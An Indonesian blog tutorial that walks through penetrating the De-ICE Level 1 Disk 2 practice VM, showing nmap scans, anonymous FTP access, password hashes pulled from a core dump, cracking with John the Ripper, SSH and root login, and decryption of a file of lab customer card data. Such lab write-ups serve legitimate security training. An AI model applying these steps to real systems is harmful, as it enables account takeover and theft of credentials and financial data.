Uji Penetrasi pada De-ICE Level #1 Disk #2 (De-Ice.net-1.110-1.1)

Setelah melakukan instalasi De-ICE, sekarang kita akan melakukan uji penetrasi atau penetration testing De-ICE. Ini akan sangat sangat sangat panjang, so siapin fisik (sedia kopi, rokok, kacang) sama mental (tidur cukup, jangan cari ribut sama pacar) buat baca modul hacking kali ini. Langsung aja, jalankan De-ICE pada VMware dan buka terminal. Berikut modulnya.

Gambar De-ICE

Module:

root@bt5r1:~# nmap -n 192.168.1.1-255

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-27 14:07 WIT

Nmap scan report for 192.168.1.2

Host is up (0.0000080s latency).

Not shown: 996 closed ports

PORT STATE SERVICE

80/tcp open http

443/tcp open https

902/tcp open iss-realsecure

9876/tcp open sd

Nmap scan report for 192.168.1.110

Host is up (0.16s latency).

Not shown: 996 closed ports

PORT STATE SERVICE

21/tcp open ftp

22/tcp open ssh

80/tcp open http

631/tcp open ipp

MAC Address: 00:0C:29:FB:68:A2 (VMware)

Nmap scan report for 192.168.1.254

Host is up (0.00047s latency).

All 1000 scanned ports on 192.168.1.254 are filtered

MAC Address: 00:50:56:F4:F6:BF (VMware)

Nmap done: 255 IP addresses (3 hosts up) scanned in 10.42 seconds

Dari sini kita bisa melihat, 192.168.1.2 adalah IP kita, berarti 192.168.1.110 adalah IP De-ICE. Setelah mengetahui IP target, maka langkah berikutnya adalah mencari informasi lebih jauh tentang port yang terbuka dan service yang kemungkinan berjalan.

Module:

root@bt5r1:~# nmap -n -sS -sV -O 192.168.1.110

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-27 14:07 WIT

Nmap scan report for 192.168.1.110

Host is up (0.034s latency).

Not shown: 996 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 2.0.4

22/tcp open ssh?

80/tcp open http Apache httpd 2.2.4 ((Unix) mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2)

631/tcp open ipp CUPS 1.1

MAC Address: 00:0C:29:FB:68:A2 (VMware)

Device type: general purpose

Running: Linux 2.6.X

OS details: Linux 2.6.13 - 2.6.31

Network Distance: 1 hop

Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 86.34 seconds

Dari hasil scan, dapat dilihat bahwa korban mempunyai port ftp, ssh, dan httpd (Apache = Web Server) yang aktif. Informasi terasa sangat kurang, untuk itu, mari kita login ftp sebagai akun anonim untuk mencari tau lebih jauh lagi.

Module:

root@bt5r1:~# ftp 192.168.1.110

Connected to 192.168.1.110.

220 (vsFTPd 2.0.4)

Name (192.168.1.110:root): anonymous

331 Please specify the password.

Password: (biarkan kosong lalu tekan "Enter")

230 Login successful.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp>

Sampai di sini kita telah berhasil masuk ke ftp, selanjutnya, kita akan mengeksplorasi struktur direktori sistem.

Modul:

ftp> ls -a

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

drwxr-xr-x 4 0 0 80 Mar 15 2007 .

drwxr-xr-x 4 0 0 80 Mar 15 2007 ..

drwxr-xr-x 7 1000 513 160 Mar 15 2007 download

drwxrwxrwx 2 0 0 60 Feb 26 2007 incoming

226 Directory send OK.

ftp> cd download

250 Directory successfully changed.

ftp> ls -a

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

drwxr-xr-x 7 1000 513 160 Mar 15 2007 .

drwxr-xr-x 4 0 0 80 Mar 15 2007 ..

drwxr-xr-x 6 1000 513 340 Mar 15 2007 etc

drwxr-xr-x 4 1000 513 100 Mar 15 2007 opt

drwxr-xr-x 10 1000 513 400 Mar 15 2007 root

drwxr-xr-x 5 1000 513 120 Mar 15 2007 usr

drwxr-xr-x 3 1000 513 80 Mar 15 2007 var

226 Directory send OK.

ftp> cd etc

250 Directory successfully changed.

ftp> ls -a

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

drwxr-xr-x 6 1000 513 340 Mar 15 2007 .

drwxr-xr-x 7 1000 513 160 Mar 15 2007 ..

drwxr-xr-x 4 1000 513 160 Mar 15 2007 X11

-rw-r--r-- 1 1000 513 362436 Mar 03 2007 core

drwxr-xr-x 2 1000 513 100 Mar 15 2007 fonts

-rw-r--r-- 1 1000 513 780 Apr 30 2005 hosts

-rw-r--r-- 1 1000 513 718 Jul 03 2005 inputrc

-rw-r--r-- 1 1000 513 1296 Jun 10 2006 issue

[snip...]

226 Directory send OK.

Lihat ada file core yang menyimpan data core dump (memory, storage, dan debugging dump). Ambil file ini untuk dianalisa, lalu kita logout ftp client.

Module:

ftp> get core

local: core remote: core

200 PORT command successful. Consider using PASV.

150 Opening BINARY mode data connection for core (362436 bytes).

226 File send OK.

362436 bytes received in 0.03 secs (13026.4 kB/s)

ftp> exit

221 Goodbye.

Mari kita lihat file core ini. File yang kita download via ftp tadi akan otomatis tersimpat di direktori home kita, yaitu /root/

Module:

root@bt5r1:~# strings core

tdxt

CORE

test.pl

/usr/bin/perl ./test.pl -d

CORE

FLINUX

!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~

ocks

CPLUS_INCLUDE_PATH=/usr/lib/qt/include:/usr/lib/qt/include

MANPATH=/usr/local/man:/usr/man:/usr/X11R6/man:/opt/kde/man:/usr/lib/qt/doc/man

KDE_MULTIHEAD=false

HZ=100

HOSTNAME=slax.slackware-live.cd

SHELL=/bin/bash

TERM=xterm

GTK2_RC_FILES=/etc/gtk-2.0/gtkrc:/root/.gtkrc-2.0:/root/.kde/share/config/gtkrc-2.0

GTK_RC_FILES=/etc/gtk/gtkrc:/root/.gtkrc:/root/.kde/share/config/gtkrc

GS_LIB=/root/.fonts

WINDOWID=25165831

HUSHLOGIN=FALSE

QTDIR=/usr/lib/qt

LC_ALL=C

KDE_FULL_SESSION=true

USER=root

[snip...]

root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

Wow! Lihat huruf yang dicetak tebal berwarna merah. Itu adalah hash string password milik user De-ICE. Lalu apa selanjutnya? Kita harus melakukan cracking attack password. Ini bisa dilakukan dengan progran John The Ripper. Kita membutuhkan sebuah dictionary untuk membantu proses cracking password. Kamu bisa mendapatkan dictionary-nya di sini.

Module:

root@bt5r1:~# cd dictionaries/

root@bt5r1:~/dictionaries# cat common-1.txt common-2.txt common-3.txt common-4.txt wordlist.txt >> /root/passwords

root@bt5r1:~/dictionaries# cd ~

Modul di atas dilakukan untuk melakukan compiling dictionary common-1.txt common-2.txt common-3.txt common-4.txt wordlist.txt

menjadi passwords di direktori /root/

Oke, kita telah mendapatkan passwordnya, sekarang, kita perlu menyusun string shadow, bermodal dari dump core yang tadi kita ambil.

Module:

root@bt5r1:~# nano /root/shadow

Setelah itu copy-paste dump core yang tercetak merah di atas:

Buang bagian merah di atas dan susun serapih mungkin menjadi:

root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::

aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::

bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::

ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

Oke, kita sudah punya shadow dari empat user, yaitu:

root, aadams, bbanter, ccoffee

Saatnya cracking! Kita sudah mempunyai file shadow dan password library di direktori /root/ Sekarang, lakukan modul ini:

root@bt5r1:~# cd /pentest/passwords/john/

root@bt5r1:/pentest/passwords/john# ./john --rules --wordlist=/root/passwords /root/shadow

Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [32/32])

Complexity (root)

Diatomaceous (ccoffee)

Zymurgy (bbanter)

guesses: 3 time: 0:00:04:40 4.37% (ETA: Thu Oct 27 16:07:48 2011) c/s: 6022 trying: Meteorologic

Session aborted

Penjelasan dari modul di atas:

Kita manggunakan software bernama John The Ripper pada direktori /pentest/passwords/john/ dengan aturan library ada di /root/passwords dan target hash string di /root/shadow. Hasilnya, ada 3 password yang ter-crack dalam waktu 0:00:04:40. Yaitu:

Complexity (root)

Diatomaceous (ccoffee)

Zymurgy (bbanter)

Wah, sudah dapat passwordnya? Lantas bagaimana? Itu terserah kalian, tap berikut adalah module apa yang saya kerjakan setelah mendapatkan password-nya:

root@blue-dragon:~# ssh bbanter@192.168.1.110

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!

Someone could be eavesdropping on you right now (man-in-the-middle attack)!

It is also possible that the RSA host key has just been changed.

The fingerprint for the RSA key sent by the remote host is

4c:46:df:3d:04:f5:05:07:16:ee:76:3e:48:0a:5a:b8.

Please contact your system administrator.

Add correct host key in /root/.ssh/known_hosts to get rid of this message.

Offending key in /root/.ssh/known_hosts:2

RSA host key for 192.168.1.110 has changed and you have requested strict checking.

Host key verification failed.

root@blue-dragon:~# nano /root/.ssh/known_hosts

root@blue-dragon:~# ssh bbanter@192.168.1.110

The authenticity of host '192.168.1.110 (192.168.1.110)' can't be established.

RSA key fingerprint is 4c:46:df:3d:04:f5:05:07:16:ee:76:3e:48:0a:5a:b8.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added '192.168.1.110' (RSA) to the list of known hosts.

bbanter@192.168.1.110's password: [masukkan sesuai hasil crack]

Linux 2.6.16.

bbanter@slax:~$ ls -a

./ ../ .screenrc

bbanter@slax:~$ cd ..

bbanter@slax:/home$ ls -a

./ ../ aadams/ bbanter/ ccoffee/ ftp/ root/

bbanter@slax:/home$ cd root/

bbanter@slax:/home/root$ ls -a

./ ../ .save/ .screenrc

bbanter@slax:/home/root$ cd .save/

-bash: cd: .save/: Permission denied

bbanter@slax:/home/root$ su

Password: **********

root@slax:/home/root# pwd

/home/root

root@slax:/home/root# cd .save/

root@slax:/home/root/.save# ls -a

. .. copy.sh customer_account.csv.enc

root@slax:/home/root/.save# cat copy.sh

#!/bin/sh

#encrypt files in ftp/incoming

openssl enc -aes-256-cbc -salt -in /home/ftp/incoming/$1 -out /home/root/.save/$1.enc -pass file:/etc/ssl/certs/pw

#remove old file

rm /home/ftp/incoming/$1

root@slax:/home/root/.save# openssl enc -aes-256-cbc -salt -in /home/ftp/incoming/$1 -out /home/root/.save/$1.enc -pass file:/etc/ssl/certs/pw

3838:error:0200B015:system library:fread:Is a directory:bss_file.c:198:

3838:error:20082002:BIO routines:FILE_READ:system lib:bss_file.c:199:

root@slax:/home/root/.save# openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw

root@slax:/home/root/.save# ls -a

. .. .enc copy.sh customer_account.csv customer_account.csv.enc

root@slax:/home/root/.save# cat customer_account.csv

"CustomerID","CustomerName","CCType","AccountNo","ExpDate","DelMethod"

1002,"Mozart Exercise Balls Corp.","VISA","2412225132153211","11/09","SHIP"

1003,"Brahms 4-Hands Pianos","MC","3513151542522415","07/08","SHIP"

1004,"Strauss Blue River Drinks","MC","2514351522413214","02/08","PICKUP"

1005,"Beethoven Hearing-Aid Corp.","VISA","5126391235199246","09/09","SHIP"

1006,"Mendelssohn Wedding Dresses","MC","6147032541326464","01/10","PICKUP"

1007,"Tchaikovsky Nut Importer and Supplies","VISA","4123214145321524","05/08","SHIP"

root@slax:/home/root/.save#

Apa yang saya kerjakan adalah mencoba masuk ke direktori yang tingkat privilege-nya tinggi, yaitu /root/.save. Setelah masuk ternyata ada file tentang customer, cara mengambilnya adalah dengan menjalankan modul copy.sh dengan sedikit perbaikan syntax.

Sekian tutor dari saya, selamat bersenang-senang (=

By: Blue Dragon

Uji Penetrasi pada De-ICE Level #1 Disk #2 (De-Ice.net-1.110-1.1)

Related Posts

0 comment:

Post a Comment